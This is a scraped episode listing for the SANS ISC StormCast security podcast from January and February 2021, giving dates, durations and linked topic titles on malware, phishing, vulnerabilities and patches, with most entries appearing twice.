Pretending to be an Outlook Version Update https://isc.sans.edu/forums/diary/Pretending+to+be+an+Outlook+Version+Update/27144/ Geolocating Satori Botnet Scanning Port 26 https://isc.sans.edu/forums/diary/So+where+did+those+Satori+attacks+come+from/27140/ Alexa Skill Security https://www.ndss-symposium.org/wp-content/uploads/ndss2021_5A-1_23111_paper.pdf TMobile Data Breach / SIM Swapping https://beta.documentcloud.org/documents/20492859-t-mobile-feb-2021-bc-data-breach
3/1/20215 minutes, 2 seconds
Episode Artwork

ISC StormCast for Friday, February 26th, 2021

Forensicating Azure VMs https://isc.sans.edu/forums/diary/Forensicating+Azure+VMs/27136/ FriarFox Browser Extension Targeting GMail Accounts https://www.proofpoint.com/us/blog/threat-insight/ta413-leverages-new-friarfox-browser-extension-target-gmail-accounts-global JSON Parser Inconsistencies https://labs.bishopfox.com/tech-blog/an-exploration-of-json-interoperability-vulnerabilities Apple MacOS Update https://www.reddit.com/r/macbook/comments/kge24m/dead_m1_mac_with_usbc_multiport_adapters/
2/26/20215 minutes, 1 second
Episode Artwork

ISC StormCast for Friday, February 26th, 2021

Forensicating Azure VMs https://isc.sans.edu/forums/diary/Forensicating+Azure+VMs/27136/ FriarFox Browser Extension Targeting GMail Accounts https://www.proofpoint.com/us/blog/threat-insight/ta413-leverages-new-friarfox-browser-extension-target-gmail-accounts-global JSON Parser Inconsistencies https://labs.bishopfox.com/tech-blog/an-exploration-of-json-interoperability-vulnerabilities Apple MacOS Update https://www.reddit.com/r/macbook/comments/kge24m/dead_m1_mac_with_usbc_multiport_adapters/
2/26/20215 minutes, 1 second
Episode Artwork

ISC StormCast for Thursday, February 25th, 2021

Malspam Pushes GuLoader for Remcos RAT https://isc.sans.edu/forums/diary/Malspam+pushes+GuLoader+for+Remcos+RAT/27132/ vCenter Exploit / Vulnerability Details https://swarm.ptsecurity.com/unauth-rce-vmware/#more-2477 DNS CNAME Tracking https://blog.lukaszolejnik.com/large-scale-analysis-of-dns-based-tracking-evasion-broad-data-leaks-included/ Cisco MSO Vulnerability https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-mso-authbyp-bb5GmBQv
2/25/20215 minutes, 23 seconds
Episode Artwork

ISC StormCast for Thursday, February 25th, 2021

Malspam Pushes GuLoader for Remcos RAT https://isc.sans.edu/forums/diary/Malspam+pushes+GuLoader+for+Remcos+RAT/27132/ vCenter Exploit / Vulnerability Details https://swarm.ptsecurity.com/unauth-rce-vmware/#more-2477 DNS CNAME Tracking https://blog.lukaszolejnik.com/large-scale-analysis-of-dns-based-tracking-evasion-broad-data-leaks-included/ Cisco MSO Vulnerability https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-mso-authbyp-bb5GmBQv
2/25/20215 minutes, 23 seconds
Episode Artwork

ISC StormCast for Wednesday, February 24th, 2021

Qakbot In a Response to Full Disclosure Post https://isc.sans.edu/forums/diary/Qakbot+in+a+response+to+Full+Disclosure+post/27130/ Firefox Total Cookie Protection https://blog.mozilla.org/security/2021/02/23/total-cookie-protection/ VMWare ESXi / vCenter Server Update https://www.vmware.com/security/advisories/VMSA-2021-0002.html Replacing Content in Signed PDFs https://www.ndss-symposium.org/wp-content/uploads/ndss2021_1B-4_24117_paper.pdf
2/24/20216 minutes, 8 seconds
Episode Artwork

ISC StormCast for Wednesday, February 24th, 2021

Qakbot In a Response to Full Disclosure Post https://isc.sans.edu/forums/diary/Qakbot+in+a+response+to+Full+Disclosure+post/27130/ Firefox Total Cookie Protection https://blog.mozilla.org/security/2021/02/23/total-cookie-protection/ VMWare ESXi / vCenter Server Update https://www.vmware.com/security/advisories/VMSA-2021-0002.html Replacing Content in Signed PDFs https://www.ndss-symposium.org/wp-content/uploads/ndss2021_1B-4_24117_paper.pdf
2/24/20216 minutes, 8 seconds
Episode Artwork

ISC StormCast for Tuesday, February 23rd, 2021

Unprotecting Malicious Documents For Inspection https://isc.sans.edu/forums/diary/Unprotecting+Malicious+Documents+For+Inspection/27126/ Brave Browser DNS Leak https://www.theregister.com/2021/02/22/in_brief_security/ Telephony DoS https://www.ic3.gov/Media/Y2021/PSA210217
2/23/20215 minutes, 45 seconds
Episode Artwork

ISC StormCast for Tuesday, February 23rd, 2021

Unprotecting Malicious Documents For Inspection https://isc.sans.edu/forums/diary/Unprotecting+Malicious+Documents+For+Inspection/27126/ Brave Browser DNS Leak https://www.theregister.com/2021/02/22/in_brief_security/ Telephony DoS https://www.ic3.gov/Media/Y2021/PSA210217
2/23/20215 minutes, 45 seconds
Episode Artwork

ISC StormCast for Monday, February 22nd, 2021

Dynamic Data Exchange (DDE) is Back in the Wild https://isc.sans.edu/forums/diary/Dynamic+Data+Exchange+DDE+is+Back+in+the+Wild/27116/ https://isc.sans.edu/forums/diary/DDE+and+oledump/27122/ macOS Malware "Prototype" https://redcanary.com/blog/clipping-silver-sparrows-wings/ New Phishing Attack Identifed: Malformed URL Prefixes https://www.greathorn.com/blog-new-phishing-attack-identified-malformed-url-prefixes/ Sonicwall SMA 100 Firmware Update https://www.sonicwall.com/support/product-notification/additional-sma-100-series-10-x-and-9-x-firmware-updates-required-updated-feb-19-2-p-m-cst/210122173415410/
2/22/20215 minutes, 48 seconds
Episode Artwork

ISC StormCast for Monday, February 22nd, 2021

Dynamic Data Exchange (DDE) is Back in the Wild https://isc.sans.edu/forums/diary/Dynamic+Data+Exchange+DDE+is+Back+in+the+Wild/27116/ https://isc.sans.edu/forums/diary/DDE+and+oledump/27122/ macOS Malware "Prototype" https://redcanary.com/blog/clipping-silver-sparrows-wings/ New Phishing Attack Identifed: Malformed URL Prefixes https://www.greathorn.com/blog-new-phishing-attack-identified-malformed-url-prefixes/ Sonicwall SMA 100 Firmware Update https://www.sonicwall.com/support/product-notification/additional-sma-100-series-10-x-and-9-x-firmware-updates-required-updated-feb-19-2-p-m-cst/210122173415410/
2/22/20215 minutes, 48 seconds
Episode Artwork

ISC StormCast for Friday, February 19th, 2021

Malspam Pushes Trickbot gtag rob13 https://isc.sans.edu/forums/diary/Malspam+pushing+Trickbot+gtag+rob13/27112/ AppleJeus https://us-cert.cisa.gov/ncas/alerts/aa21-048a Python 3 Buffer Overflow https://bugs.python.org/issue42938 Apple Platform Security Guide https://support.apple.com/guide/security/welcome/web
2/19/20215 minutes, 40 seconds
Episode Artwork

ISC StormCast for Friday, February 19th, 2021

Malspam Pushes Trickbot gtag rob13 https://isc.sans.edu/forums/diary/Malspam+pushing+Trickbot+gtag+rob13/27112/ AppleJeus https://us-cert.cisa.gov/ncas/alerts/aa21-048a Python 3 Buffer Overflow https://bugs.python.org/issue42938 Apple Platform Security Guide https://support.apple.com/guide/security/welcome/web
2/19/20215 minutes, 40 seconds
Episode Artwork

ISC StormCast for Thursday, February 18th, 2021

The new "LinkedInSecureMessage" Phish https://isc.sans.edu/forums/diary/The+new+LinkedInSecureMessage/27110/ Apple M1 Optimized Malware https://objective-see.com/blog/blog_0x62.html QNAP Surveilance Station Vulnerability https://www.qnap.com/en/security-advisory/qsa-21-07 Masslogger Exfiltrates User Credentials https://blog.talosintelligence.com/2021/02/masslogger-cred-exfil.html
2/18/20215 minutes, 53 seconds
Episode Artwork

ISC StormCast for Thursday, February 18th, 2021

The new "LinkedInSecureMessage" Phish https://isc.sans.edu/forums/diary/The+new+LinkedInSecureMessage/27110/ Apple M1 Optimized Malware https://objective-see.com/blog/blog_0x62.html QNAP Surveilance Station Vulnerability https://www.qnap.com/en/security-advisory/qsa-21-07 Masslogger Exfiltrates User Credentials https://blog.talosintelligence.com/2021/02/masslogger-cred-exfil.html
2/18/20215 minutes, 53 seconds
Episode Artwork

ISC StormCast for Wednesday, February 17th, 2021

More Weirdness on TCP Port 26 https://isc.sans.edu/forums/diary/More+weirdness+on+TCP+port+26/27106/ Microsoft Pulls Servicing Stack Update https://threatpost.com/microsoft-windows-update-patch-tuesday/163981/ Network Monitoring Company Centreon Compromised https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-005.pdf SHAREit Flaw Could Lead to Remote Code Execution https://www.trendmicro.com/en_us/research/21/b/shareit-flaw-could-lead-to-remote-code-execution.html VSCode NPM Extension RCE https://github.com/jackadamson/CVE-2021-26700
2/17/20215 minutes, 15 seconds
Episode Artwork

ISC StormCast for Wednesday, February 17th, 2021

More Weirdness on TCP Port 26 https://isc.sans.edu/forums/diary/More+weirdness+on+TCP+port+26/27106/ Microsoft Pulls Servicing Stack Update https://threatpost.com/microsoft-windows-update-patch-tuesday/163981/ Network Monitoring Company Centreon Compromised https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-005.pdf SHAREit Flaw Could Lead to Remote Code Execution https://www.trendmicro.com/en_us/research/21/b/shareit-flaw-could-lead-to-remote-code-execution.html VSCode NPM Extension RCE https://github.com/jackadamson/CVE-2021-26700
2/17/20215 minutes, 15 seconds
Episode Artwork

ISC StormCast for Tuesday, February 16th, 2021

Securing and Optimizing Networks Using pfSense Traffic Shaper to Combat Bufferbloat https://isc.sans.edu/forums/diary/Securing+and+Optimizing+Networks+Using+pfSense+Traffic+Shaper+Limiters+to+Combat+Bufferbloat/27102/ Apple to Proxy Safe Browsing Requests https://twitter.com/othermaciej/status/1359736220809531393 Power Outages and Some Network Outages as a Result https://downdetector.com Phone Scam Success Rates https://www.helpnetsecurity.com/2021/02/15/lost-money-to-phone-scams/ https://nakedsecurity.sophos.com/2021/02/12/sms-tax-scam-unmasked-bogus-but-believable-dont-fall-for-it/
2/16/20216 minutes, 39 seconds
Episode Artwork

ISC StormCast for Tuesday, February 16th, 2021

Securing and Optimizing Networks Using pfSense Traffic Shaper to Combat Bufferbloat https://isc.sans.edu/forums/diary/Securing+and+Optimizing+Networks+Using+pfSense+Traffic+Shaper+Limiters+to+Combat+Bufferbloat/27102/ Apple to Proxy Safe Browsing Requests https://twitter.com/othermaciej/status/1359736220809531393 Power Outages and Some Network Outages as a Result https://downdetector.com Phone Scam Success Rates https://www.helpnetsecurity.com/2021/02/15/lost-money-to-phone-scams/ https://nakedsecurity.sophos.com/2021/02/12/sms-tax-scam-unmasked-bogus-but-believable-dont-fall-for-it/
2/16/20216 minutes, 39 seconds
Episode Artwork

ISC StormCast for Monday, February 15th, 2021

AgentTesla Dropped Through Automatic Click in Microsoft Help File https://isc.sans.edu/forums/diary/AgentTesla+Dropped+Through+Automatic+Click+in+Microsoft+Help+File/27092/ Telegram used to Defraud Delivery Serivces https://thefintechtimes.com/sift-finds-new-telegram-fraud-exploiting-increasing-use-of-food-delivery-services/ Singtel Suffers Zero-DAy Cyberattack https://threatpost.com/singtel-zero-day-cyberattack/163938/ Vulnerabilities in Mobile Health Apps https://approov.io/download/all-that-we-let-in_hacking-mhealth-apps-and-apis.pdf Bloomberg Supermicro Story https://www.bloomberg.com/features/2021-supermicro/ https://www.theregister.com/2021/02/12/supermicro_bloomberg_spying/
2/15/20217 minutes, 49 seconds
Episode Artwork

ISC StormCast for Monday, February 15th, 2021

AgentTesla Dropped Through Automatic Click in Microsoft Help File https://isc.sans.edu/forums/diary/AgentTesla+Dropped+Through+Automatic+Click+in+Microsoft+Help+File/27092/ Telegram used to Defraud Delivery Serivces https://thefintechtimes.com/sift-finds-new-telegram-fraud-exploiting-increasing-use-of-food-delivery-services/ Singtel Suffers Zero-DAy Cyberattack https://threatpost.com/singtel-zero-day-cyberattack/163938/ Vulnerabilities in Mobile Health Apps https://approov.io/download/all-that-we-let-in_hacking-mhealth-apps-and-apis.pdf Bloomberg Supermicro Story https://www.bloomberg.com/features/2021-supermicro/ https://www.theregister.com/2021/02/12/supermicro_bloomberg_spying/
2/15/20217 minutes, 49 seconds
Episode Artwork

ISC StormCast for Friday, February 12th, 2021

Agent Tesla Hidden in Historical Anti-Malware Tool https://isc.sans.edu/forums/diary/Agent+Tesla+hidden+in+a+historical+antimalware+tool/27088/ McAfee Total Protection Vulnerabilities https://service.mcafee.com/webcenter/portal/oracle/webcenter/page/scopedMD/s55728c97_466d_4ddb_952d_05484ea932c6/Page29.jspx Intel Patches https://blogs.intel.com/technology/2021/02/ipas-security-advisories-for-february-2021 Discord Used to Distribute Malware https://www.zscaler.com/blogs/security-research/discord-cdn-popular-choice-hosting-malicious-payloads
2/12/20215 minutes, 41 seconds
Episode Artwork

ISC StormCast for Friday, February 12th, 2021

Agent Tesla Hidden in Historical Anti-Malware Tool https://isc.sans.edu/forums/diary/Agent+Tesla+hidden+in+a+historical+antimalware+tool/27088/ McAfee Total Protection Vulnerabilities https://service.mcafee.com/webcenter/portal/oracle/webcenter/page/scopedMD/s55728c97_466d_4ddb_952d_05484ea932c6/Page29.jspx Intel Patches https://blogs.intel.com/technology/2021/02/ipas-security-advisories-for-february-2021 Discord Used to Distribute Malware https://www.zscaler.com/blogs/security-research/discord-cdn-popular-choice-hosting-malicious-payloads
2/12/20215 minutes, 41 seconds
Episode Artwork

ISC StormCast for Thursday, February 11th, 2021

Phishing Message to the ISC Handlers E-Mail Distro https://isc.sans.edu/forums/diary/Phishing+message+to+the+ISC+handlers+email+distro/27082/ Google Phishing Statistics https://cloud.google.com/blog/products/workspace/how-gmail-helps-users-avoid-email-scams Adobe Security Updates https://helpx.adobe.com/security/products/acrobat/apsb21-09.html Apple Sudo Patch https://support.apple.com/en-us/HT212177 Number:Jack ISN Generation Weaknesses https://www.forescout.com/company/resources/numberjack-weak-isn-generation-in-embedded-tcpip-stacks/
2/11/20215 minutes, 47 seconds
Episode Artwork

ISC StormCast for Thursday, February 11th, 2021

Phishing Message to the ISC Handlers E-Mail Distro https://isc.sans.edu/forums/diary/Phishing+message+to+the+ISC+handlers+email+distro/27082/ Google Phishing Statistics https://cloud.google.com/blog/products/workspace/how-gmail-helps-users-avoid-email-scams Adobe Security Updates https://helpx.adobe.com/security/products/acrobat/apsb21-09.html Apple Sudo Patch https://support.apple.com/en-us/HT212177 Number:Jack ISN Generation Weaknesses https://www.forescout.com/company/resources/numberjack-weak-isn-generation-in-embedded-tcpip-stacks/
2/11/20215 minutes, 47 seconds
Episode Artwork

ISC StormCast for Wednesday, February 10th, 2021

Microsoft Patch Tuesday https://isc.sans.edu/forums/diary/Microsoft+February+2021+Patch+Tuesday/27080/ https://www.theregister.com/2021/02/09/microsoft_patch_tuesday/ Dependency Confusion https://medium.com/@alex.birsan/dependency-confusion-4a5d60fec610 https://azure.microsoft.com/mediahandler/files/resourcefiles/3-ways-to-mitigate-risk-using-private-package-feeds/3%20Ways%20to%20Mitigate%20Risk%20When%20Using%20Private%20Package%20Feeds%20-%20v1.0.pdf
2/10/20216 minutes, 31 seconds
Episode Artwork

ISC StormCast for Wednesday, February 10th, 2021

Microsoft Patch Tuesday https://isc.sans.edu/forums/diary/Microsoft+February+2021+Patch+Tuesday/27080/ https://www.theregister.com/2021/02/09/microsoft_patch_tuesday/ Dependency Confusion https://medium.com/@alex.birsan/dependency-confusion-4a5d60fec610 https://azure.microsoft.com/mediahandler/files/resourcefiles/3-ways-to-mitigate-risk-using-private-package-feeds/3%20Ways%20to%20Mitigate%20Risk%20When%20Using%20Private%20Package%20Feeds%20-%20v1.0.pdf
2/10/20216 minutes, 31 seconds
Episode Artwork

ISC StormCast for Tuesday, February 9th, 2021

Tshark and Malware Analysis https://isc.sans.edu/forums/diary/Quickie+tshark+Malware+Analysis/27076/ Barcode Scanner Going Bad https://blog.malwarebytes.com/android/2021/02/barcode-scanner-app-on-google-play-infects-10-million-users-with-one-update/ Morse Code Obfuscation https://www.bleepingcomputer.com/news/security/new-phishing-attack-uses-morse-code-to-hide-malicious-urls/ Firefox Update https://www.mozilla.org/en-US/security/advisories/mfsa2021-06/ Water Treatment Facility Compromised https://www.reuters.com/article/us-usa-cyber-florida/hackers-broke-into-florida-towns-water-treatment-plant-attempted-to-poison-supply-sheriff-says-idUSKBN2A82FV
2/9/20215 minutes, 49 seconds
Episode Artwork

ISC StormCast for Tuesday, February 9th, 2021

Tshark and Malware Analysis https://isc.sans.edu/forums/diary/Quickie+tshark+Malware+Analysis/27076/ Barcode Scanner Going Bad https://blog.malwarebytes.com/android/2021/02/barcode-scanner-app-on-google-play-infects-10-million-users-with-one-update/ Morse Code Obfuscation https://www.bleepingcomputer.com/news/security/new-phishing-attack-uses-morse-code-to-hide-malicious-urls/ Firefox Update https://www.mozilla.org/en-US/security/advisories/mfsa2021-06/ Water Treatment Facility Compromised https://www.reuters.com/article/us-usa-cyber-florida/hackers-broke-into-florida-towns-water-treatment-plant-attempted-to-poison-supply-sheriff-says-idUSKBN2A82FV
2/9/20215 minutes, 49 seconds
Episode Artwork

ISC StormCast for Monday, February 8th, 2021

VBA Macro Trying to Alter the Application Menus https://isc.sans.edu/forums/diary/VBA+Macro+Trying+to+Alter+the+Application+Menus/27068/ The Great Suspender Going Malicious https://www.zdnet.com/article/google-kills-the-great-suspender-heres-what-you-should-do-next/ https://github.com/greatsuspender/thegreatsuspender/issues/1263 Google Chrome Zero Day https://chromereleases.googleblog.com/2021/02/stable-channel-update-for-desktop_4.html Plex Media SSDP Amplication DDoS https://www.netscout.com/blog/asert/plex-media-ssdp-pmssdp-reflectionamplification-ddos-attack
2/8/20216 minutes
Episode Artwork

ISC StormCast for Monday, February 8th, 2021

VBA Macro Trying to Alter the Application Menus https://isc.sans.edu/forums/diary/VBA+Macro+Trying+to+Alter+the+Application+Menus/27068/ The Great Suspender Going Malicious https://www.zdnet.com/article/google-kills-the-great-suspender-heres-what-you-should-do-next/ https://github.com/greatsuspender/thegreatsuspender/issues/1263 Google Chrome Zero Day https://chromereleases.googleblog.com/2021/02/stable-channel-update-for-desktop_4.html Plex Media SSDP Amplication DDoS https://www.netscout.com/blog/asert/plex-media-ssdp-pmssdp-reflectionamplification-ddos-attack
2/8/20216 minutes
Episode Artwork

ISC StormCast for Friday, February 5th, 2021

Abusing Google Chrome Extension Syncing For Data Exfiltration and C&C https://isc.sans.edu/forums/diary/Abusing+Google+Chrome+extension+syncing+for+data+exfiltration+and+CC/27066/ Microsoft Defender ATP Google Chrome False Positive https://twitter.com/itquartz/status/1356940218138509312 Social Engineering Attacks against Security Researchers Used IE 0 day https://enki.co.kr/blog/2021/02/04/ie_0day.html# https://www.bleepingcomputer.com/news/security/hacking-group-also-used-an-ie-zero-day-against-security-researchers/
2/5/20216 minutes, 27 seconds
Episode Artwork

ISC StormCast for Friday, February 5th, 2021

Abusing Google Chrome Extension Syncing For Data Exfiltration and C&C https://isc.sans.edu/forums/diary/Abusing+Google+Chrome+extension+syncing+for+data+exfiltration+and+CC/27066/ Microsoft Defender ATP Google Chrome False Positive https://twitter.com/itquartz/status/1356940218138509312 Social Engineering Attacks against Security Researchers Used IE 0 day https://enki.co.kr/blog/2021/02/04/ie_0day.html# https://www.bleepingcomputer.com/news/security/hacking-group-also-used-an-ie-zero-day-against-security-researchers/
2/5/20216 minutes, 27 seconds
Episode Artwork

ISC StormCast for Thursday, February 4th, 2021

Excel Spreadsheets Push SystemBC Malware https://isc.sans.edu/forums/diary/Excel+spreadsheets+push+SystemBC+malware/27060/ SolarWinds Vulnerability https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=28389 SolarWinds SANS Lightning Summit https://www.sans.org/webcasts/solarwinds-lightning-summit-118550 SonicWall Patch https://www.sonicwall.com/support/product-notification/urgent-patch-available-for-sma-100-series-10-x-firmware-zero-day-vulnerability-updated-feb-3-2-p-m-cst/210122173415410/ Cisco Advisories https://tools.cisco.com/security/center/publicationListing.x Realtek RTL8195A Wi-Fi Module Vulnerability https://www.vdoo.com/blog/realtek-rtl8195a-vulnerabilities-discovered
2/4/20216 minutes, 3 seconds
Episode Artwork

ISC StormCast for Thursday, February 4th, 2021

Excel Spreadsheets Push SystemBC Malware https://isc.sans.edu/forums/diary/Excel+spreadsheets+push+SystemBC+malware/27060/ SolarWinds Vulnerability https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=28389 SolarWinds SANS Lightning Summit https://www.sans.org/webcasts/solarwinds-lightning-summit-118550 SonicWall Patch https://www.sonicwall.com/support/product-notification/urgent-patch-available-for-sma-100-series-10-x-firmware-zero-day-vulnerability-updated-feb-3-2-p-m-cst/210122173415410/ Cisco Advisories https://tools.cisco.com/security/center/publicationListing.x Realtek RTL8195A Wi-Fi Module Vulnerability https://www.vdoo.com/blog/realtek-rtl8195a-vulnerabilities-discovered
2/4/20216 minutes, 3 seconds
Episode Artwork

ISC StormCast for Wednesday, February 3rd, 2021

New Example of XSL Script Processing aka "Mitre T1220" https://isc.sans.edu/forums/diary/New+Example+of+XSL+Script+Processing+aka+Mitre+T1220/27056/ Camerfirma Certificate Authority Revocation https://groups.google.com/g/mozilla.dev.security.policy/c/jif4zWNgGPw Kobalos HPC Linux Malware https://www.welivesecurity.com/2021/02/02/kobalos-complex-linux-threat-high-performance-computing-infrastructure/ Agent Tesla Overwries Windows AMSI https://threatpost.com/agent-tesla-microsoft-asmi/163581/
2/3/20216 minutes, 7 seconds
Episode Artwork

ISC StormCast for Wednesday, February 3rd, 2021

New Example of XSL Script Processing aka "Mitre T1220" https://isc.sans.edu/forums/diary/New+Example+of+XSL+Script+Processing+aka+Mitre+T1220/27056/ Camerfirma Certificate Authority Revocation https://groups.google.com/g/mozilla.dev.security.policy/c/jif4zWNgGPw Kobalos HPC Linux Malware https://www.welivesecurity.com/2021/02/02/kobalos-complex-linux-threat-high-performance-computing-infrastructure/ Agent Tesla Overwries Windows AMSI https://threatpost.com/agent-tesla-microsoft-asmi/163581/
2/3/20216 minutes, 7 seconds
Episode Artwork

ISC StormCast for Tuesday, February 2nd, 2021

MacOS 11.2 Update https://support.apple.com/en-us/HT212147 Objective-See Tools Now Open Sources https://twitter.com/patrickwardle/status/1356149073045143553 iMessage Blastdoor https://googleprojectzero.blogspot.com/2021/01/a-look-at-imessage-in-ios-14.html SonicWall Update https://www.sonicwall.com/support/product-notification/urgent-security-notice-sonicwall-confirms-sma-100-series-10-x-zero-day-vulnerability-feb-1-2-p-m-cst/210122173415410/
2/2/20216 minutes, 7 seconds
Episode Artwork

ISC StormCast for Tuesday, February 2nd, 2021

MacOS 11.2 Update https://support.apple.com/en-us/HT212147 Objective-See Tools Now Open Sources https://twitter.com/patrickwardle/status/1356149073045143553 iMessage Blastdoor https://googleprojectzero.blogspot.com/2021/01/a-look-at-imessage-in-ios-14.html SonicWall Update https://www.sonicwall.com/support/product-notification/urgent-security-notice-sonicwall-confirms-sma-100-series-10-x-zero-day-vulnerability-feb-1-2-p-m-cst/210122173415410/
2/2/20216 minutes, 7 seconds
Episode Artwork

ISC StormCast for Monday, February 1st, 2021

Perl.com Domain Hijacked https://www.ehackingnews.com/2021/01/perlcom-official-site-for-perl.html Spamcop Domain Expired https://www.bleepingcomputer.com/news/security/spamcop-anti-spam-service-suffers-an-outage-after-its-domain-expired/ libgcrypt vulnerability https://lists.gnupg.org/pipermail/gnupg-announce/2021q1/000456.html Fingerprinting QUIC https://arxiv.org/pdf/2101.11871.pdf
2/1/20215 minutes, 25 seconds
Episode Artwork

ISC StormCast for Monday, February 1st, 2021

Perl.com Domain Hijacked https://www.ehackingnews.com/2021/01/perlcom-official-site-for-perl.html Spamcop Domain Expired https://www.bleepingcomputer.com/news/security/spamcop-anti-spam-service-suffers-an-outage-after-its-domain-expired/ libgcrypt vulnerability https://lists.gnupg.org/pipermail/gnupg-announce/2021q1/000456.html Fingerprinting QUIC https://arxiv.org/pdf/2101.11871.pdf
2/1/20215 minutes, 25 seconds
Episode Artwork

ISC StormCast for Friday, January 29th, 2021

New Cryptojacking Malware https://unit42.paloaltonetworks.com/pro-ocean-rocke-groups-new-cryptojacking-malware/ SlipStreaming https://www.armis.com/resources/iot-security-blog/nat-slipstreaming-v2-0-new-attack-variant-can-expose-all-internal-network-devices-to-the-internet/ Shadowsocks https://shadowsocks.org/en/index.html
1/29/20216 minutes, 1 second
Episode Artwork

ISC StormCast for Friday, January 29th, 2021

New Cryptojacking Malware https://unit42.paloaltonetworks.com/pro-ocean-rocke-groups-new-cryptojacking-malware/ SlipStreaming https://www.armis.com/resources/iot-security-blog/nat-slipstreaming-v2-0-new-attack-variant-can-expose-all-internal-network-devices-to-the-internet/ Shadowsocks https://shadowsocks.org/en/index.html
1/29/20216 minutes, 1 second
Episode Artwork

ISC StormCast for Thursday, January 28th, 2021

Emotet vs. Windows Attack Surface Reduction https://isc.sans.edu/forums/diary/Emotet+vs+Windows+Attack+Surface+Reduction/27036/ Go Lang Vulnerability https://blog.golang.org/path-security Azure Docker Escape https://www.intezer.com/blog/research/how-we-hacked-azure-functions-and-escaped-docker/
1/28/20216 minutes, 17 seconds
Episode Artwork

ISC StormCast for Thursday, January 28th, 2021

Emotet vs. Windows Attack Surface Reduction https://isc.sans.edu/forums/diary/Emotet+vs+Windows+Attack+Surface+Reduction/27036/ Go Lang Vulnerability https://blog.golang.org/path-security Azure Docker Escape https://www.intezer.com/blog/research/how-we-hacked-azure-functions-and-escaped-docker/
1/28/20216 minutes, 17 seconds
Episode Artwork

ISC StormCast for Wednesday, January 27th, 2021

Critical sudo Vulnerability https://blog.qualys.com/vulnerabilities-research/2021/01/26/cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron-samedit Quakbot (QBot) Update https://isc.sans.edu/forums/diary/TA551+Shathak+Word+docs+push+Qakbot+Qbot/27030/ Targeting Security Researchers https://blog.google/threat-analysis-group/new-campaign-targeting-security-researchers/ Apple Updates iOS, iPad, tvOS, watchOS, Xcode and iCloud for Windows https://support.apple.com/en-us/HT201222
1/27/20216 minutes, 41 seconds
Episode Artwork

ISC StormCast for Wednesday, January 27th, 2021

Critical sudo Vulnerability https://blog.qualys.com/vulnerabilities-research/2021/01/26/cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron-samedit Quakbot (QBot) Update https://isc.sans.edu/forums/diary/TA551+Shathak+Word+docs+push+Qakbot+Qbot/27030/ Targeting Security Researchers https://blog.google/threat-analysis-group/new-campaign-targeting-security-researchers/ Apple Updates iOS, iPad, tvOS, watchOS, Xcode and iCloud for Windows https://support.apple.com/en-us/HT201222
1/27/20216 minutes, 41 seconds
Episode Artwork

ISC StormCast for Tuesday, January 26th, 2021

Fun With nmap nse Scripts and DoH (DNS over HTTPS) https://isc.sans.edu/forums/diary/Fun+with+NMAP+NSE+Scripts+and+DOH+DNS+over+HTTPS/27026/ Malicious NPM Module Stealing Discord Passwords https://blog.sonatype.com/cursedgrabber-strikes-again-sonatype-spots-new-malware-campaign-against-software-supply-chains Mitigating the $I30 Bug https://www.osr.com/blog/2021/01/21/mitigating-the-i30bitmap-ntfs-bug/ https://github.com/OSRDrivers/i30Flt ProtonVPN BSOD https://protonstatus.com/incidents/124
1/26/20214 minutes, 46 seconds
Episode Artwork

ISC StormCast for Tuesday, January 26th, 2021

Fun With nmap nse Scripts and DoH (DNS over HTTPS) https://isc.sans.edu/forums/diary/Fun+with+NMAP+NSE+Scripts+and+DOH+DNS+over+HTTPS/27026/ Malicious NPM Module Stealing Discord Passwords https://blog.sonatype.com/cursedgrabber-strikes-again-sonatype-spots-new-malware-campaign-against-software-supply-chains Mitigating the $I30 Bug https://www.osr.com/blog/2021/01/21/mitigating-the-i30bitmap-ntfs-bug/ https://github.com/OSRDrivers/i30Flt ProtonVPN BSOD https://protonstatus.com/incidents/124
1/26/20214 minutes, 46 seconds
Episode Artwork

ISC StormCast for Monday, January 25th, 2021

Another File Extension to Block: JNLP https://isc.sans.edu/forums/diary/Another+File+Extension+to+Block+in+your+MTA+jnlp/27018/ SonicWall Vulnerability Used to Breach SonicWall https://www.sonicwall.com/support/product-notification/urgent-security-notice-netextender-vpn-client-10-x-sma-100-series-vulnerability-updated-jan-23-2021/210122173415410/ iObit Forum Breached / Used for Ransomware Distribution https://www.bleepingcomputer.com/forums/t/741190/derohe-ransomware-distributed-through-fake-iobit-one-year-free-license-key-promo/
1/25/20215 minutes, 57 seconds
Episode Artwork

ISC StormCast for Monday, January 25th, 2021

Another File Extension to Block: JNLP https://isc.sans.edu/forums/diary/Another+File+Extension+to+Block+in+your+MTA+jnlp/27018/ SonicWall Vulnerability Used to Breach SonicWall https://www.sonicwall.com/support/product-notification/urgent-security-notice-netextender-vpn-client-10-x-sma-100-series-vulnerability-updated-jan-23-2021/210122173415410/ iObit Forum Breached / Used for Ransomware Distribution https://www.bleepingcomputer.com/forums/t/741190/derohe-ransomware-distributed-through-fake-iobit-one-year-free-license-key-promo/
1/25/20215 minutes, 57 seconds
Episode Artwork

ISC StormCast for Friday, January 22nd, 2021

Powershell Ropping REvil Ransomware https://isc.sans.edu/forums/diary/Powershell+Dropping+a+REvil+Ransomware/27012/ SAP Exploit Circulating https://onapsis.com/blog/new-sap-exploit-published-online-how-stay-secure Oracle Critical Patch Update https://www.oracle.com/security-alerts/cpujan2021.html RDP Used for DDoS https://www.netscout.com/blog/asert/microsoft-remote-desktop-protocol-rdp-reflectionamplification Billy Wilson: Mitigating Attacks Against Supercomputers with KRSI https://www.sans.org/reading-room/whitepapers/linux/mitigating-attacks-supercomputer-krsi-40010
1/22/202113 minutes, 50 seconds
Episode Artwork

ISC StormCast for Friday, January 22nd, 2021

Powershell Ropping REvil Ransomware https://isc.sans.edu/forums/diary/Powershell+Dropping+a+REvil+Ransomware/27012/ SAP Exploit Circulating https://onapsis.com/blog/new-sap-exploit-published-online-how-stay-secure Oracle Critical Patch Update https://www.oracle.com/security-alerts/cpujan2021.html RDP Used for DDoS https://www.netscout.com/blog/asert/microsoft-remote-desktop-protocol-rdp-reflectionamplification Billy Wilson: Mitigating Attacks Against Supercomputers with KRSI https://www.sans.org/reading-room/whitepapers/linux/mitigating-attacks-supercomputer-krsi-40010
1/22/202113 minutes, 50 seconds
Episode Artwork

